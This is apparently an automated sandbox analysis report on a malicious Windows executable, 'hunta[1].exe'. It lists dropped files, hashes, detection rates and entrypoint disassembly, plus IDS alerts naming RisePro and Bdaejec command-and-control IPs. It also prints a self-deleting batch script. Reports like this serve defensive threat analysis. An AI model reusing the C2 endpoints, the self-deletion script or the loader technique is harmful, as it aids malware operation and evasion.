Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425719" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k2[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k3[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k4[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k5[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

Download File

Process:	C:\Users\user\Desktop\hunta[1].exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2383872
Entropy (8bit):	7.92928937448595
Encrypted:	false
SSDEEP:	49152:QSPmGpG0CTiBOGt/tP0HtQ0dcMjXyMxB/x5UGn77l7G4bo8jqOs8DoV:bPmG8HTiVtWQXqiMxVQaRGy3qOs8U
MD5:	651DE10CFAAA78BE50EDA9F3F0CE9EA7
SHA1:	6B922567FC5880E38FC9A3EACC24F6BAB3785731
SHA-256:	E5CB4F3F8D41C28116B9FF3253AB5F6D6736E18DA2D225CF15379954B2751643
SHA-512:	B3D038963134F43113831D929787AAC25E597E17E763C3955660E7D1ED63539C7A929A19A95AE306B390955FFCBAD89EB3857402BDE3159093AC43DFE9244446
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L......e...............".....,........[...........@..........................`[...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............................@... .P+.......... ..............@...gpsaqaiu......?......"..............@...zlufpcnd......Z.......#.............@....taggant.0....Z.."....#.............@......u...P....[..B....$............. ...................................................................................................................................................

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\hunta[1].exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\04AB3B47.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\149657b0.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	186
Entropy (8bit):	5.037975025098174
Encrypted:	false
SSDEEP:	3:jdKZOMERE2J5xAIfyYMD2UMERE2J5xAIfy2KReJsjIdKZOMERE2J5xAI8zSSIvn:jdKoFi23fbMD2UFi23f1/dKoFi23fm7S
MD5:	A36A25EA46FD51980F8AA5BAC2926029
SHA1:	B433B68DDD9D510829FE4B55EFA1D7A68125AFA4
SHA-256:	622456EADAFBE5092A5DA5C0D45E8CFA46640A5558EEB4977E559ACBC71FE529
SHA-512:	A00D1582041D84DAC3C2D18D23DE84ED5A11B3F6103533D461DF933DDC61B237CBAB13C794B59FC41C6606660B154E255445067434C90D3B681469D94014B735
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\WwKLWFk.exe"..if exist "C:\Users\user\AppData\Local\Temp\WwKLWFk.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\149657b0.bat"..

C:\Users\user\AppData\Local\Temp\25207D98.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\3DBB7675.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\3FFA2613.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\60FA3E7B.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\6B066AF4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\6CD5636F.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\73BF30A5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Download File

Process:	C:\Users\user\Desktop\hunta[1].exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe, Detection: malicious, Browse Filename: FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exe, Detection: malicious, Browse Filename: Fantom.exe, Detection: malicious, Browse Filename: FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exe, Detection: malicious, Browse Filename: fax_390392029_072514.exe, Detection: malicious, Browse Filename: F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exe, Detection: malicious, Browse Filename: F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe, Detection: malicious, Browse Filename: F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exe, Detection: malicious, Browse Filename: F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exe, Detection: malicious, Browse Filename: Endermanch@SecurityDefener2015.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rage131MP.tmp

Download File

Process:	C:\Users\user\Desktop\hunta[1].exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	13
Entropy (8bit):	2.8731406795131336
Encrypted:	false
SSDEEP:	3:LEQFgn:6n
MD5:	F23A032E765F1A346A05F8C739508BAE
SHA1:	BB87AC0EC1E76E65A6217216AB17D49EC440F223
SHA-256:	A08B215A7DA674F033A10189A1579E758D854723A076B89651C9D527245A0D7A
SHA-512:	E68073B7AD60591266AFA80ADB05C1D16B6BE980F8E942FEB05265753B3B2E5A41C2277424CB2CD27ABFD4B78AAB0439304433B932F31C209C129D5DADCA6890
Malicious:	false
Preview:	1721871434085

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.296108056230021
Encrypted:	false
SSDEEP:	6144:641fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+Q4mBMZJh1Vjq:j1/YCW2AoQ0Ni64wMHrV2
MD5:	F3B3450CB71F2E7F3309FA2B02FA6D35
SHA1:	FD80BF3B5DF694D7FD6162FC065645DEA1B834F2
SHA-256:	4DA3591582617C629138DE6339E91CF2D57ED1FA93B42C98B23FF09B2E5A2542
SHA-512:	5695FE1C70C376AD84EF72C40B8D16F6FACEC0E2B8CCAC65ED90264FD9AC5FE0A6570A966A92514BDF85C62B484E5ACE7833BDB9D2CBEEBD1692576D37A3AB70
Malicious:	false
Preview:	regfH...H....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....'...............................................................................................................................................................................................................................................................................................................................................+)..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.92928937448595
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hunta[1].exe
File size:	2'383'872 bytes
MD5:	651de10cfaaa78be50eda9f3f0ce9ea7
SHA1:	6b922567fc5880e38fc9a3eacc24f6bab3785731
SHA256:	e5cb4f3f8d41c28116b9ff3253ab5f6d6736e18da2d225cf15379954b2751643
SHA512:	b3d038963134f43113831d929787aac25e597e17e763c3955660e7d1ed63539c7a929a19a95ae306b390955ffcbad89eb3857402bde3159093ac43dfe9244446
SSDEEP:	49152:QSPmGpG0CTiBOGt/tP0HtQ0dcMjXyMxB/x5UGn77l7G4bo8jqOs8DoV:bPmG8HTiVtWQXqiMxVQaRGy3qOs8U
TLSH:	A1B523C87C455053C6803B7808E2FBB8135EFD666811A4DD1DDDBFABB5B3A1E2A1281D
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....

File Icon


Icon Hash:	7192ecece8b2924d

Static PE Info

General

Entrypoint:	0x9b1000
Entrypoint Section:	u
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x65C5D990 [Fri Feb 9 07:51:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 4C4B7757h
mov dword ptr [ebp-44h], 2E6B4657h
mov dword ptr [ebp-40h], 00657865h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FF2E4DBEBB5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFFCD8Fh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FF2E4DBECFEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FF2E4DBEC04h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FF2E4DBEBFBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x149054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x137000	0x110a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1491f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x136000	0x8ee00	cd6442fec8f341707696f984faa4d78b	False	0.9998547544838146	data	7.9863529700778955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x137000	0x110a0	0x2000	727385ea023e9253dbdf69e389aa8ff1	False	0.9827880859375	data	7.902116199037549	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x149000	0x1000	0x200	588e00183b8b4dbb8c7106492f04143d	False	0.14453125	data	0.9824704719748909	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x14a000	0x2b5000	0x200	7a50857f6d34b47210dbbad5003b056c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gpsaqaiu	0x3ff000	0x1ae000	0x1ad600	ad542a4e9f81fcf7589b29333531520d	False	0.9599566730349345	data	7.9114235300996505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zlufpcnd	0x5ad000	0x1000	0x400	b1ea94bf854d31daec7fad7084ce733f	False	0.7734375	data	6.143680843141886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x5ae000	0x3000	0x2200	68cde77e3c15a44cac965f245c5cd08f	False	0.06261488970588236	DOS executable (COM)	0.793567734391058	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
u	0x5b1000	0x5000	0x4200	59b6515994875e6b630ac9b497033341	False	0.7775804924242424	data	6.9350665765420185	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x59b58c	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m	Russian	Russia	0.10367620962971726
RT_GROUP_ICON	0x5abdb4	0x14	data	Russian	Russia	1.15
RT_VERSION	0x5abdc8	0x2b4	data	Russian	Russia	0.48121387283236994
RT_MANIFEST	0x5ac07c	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397
RT_MANIFEST	0x5ac362	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T02:17:03.940751+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49725	50500	192.168.2.10	193.233.132.62
2024-07-25T02:16:43.753403+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49718	443	192.168.2.10	20.189.173.21
2024-07-25T02:16:37.270173+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49710	799	192.168.2.10	44.221.84.105
2024-07-25T02:16:43.236158+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49713	50500	192.168.2.10	193.233.132.62
2024-07-25T02:16:30.189325+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	59684	53	192.168.2.10	1.1.1.1
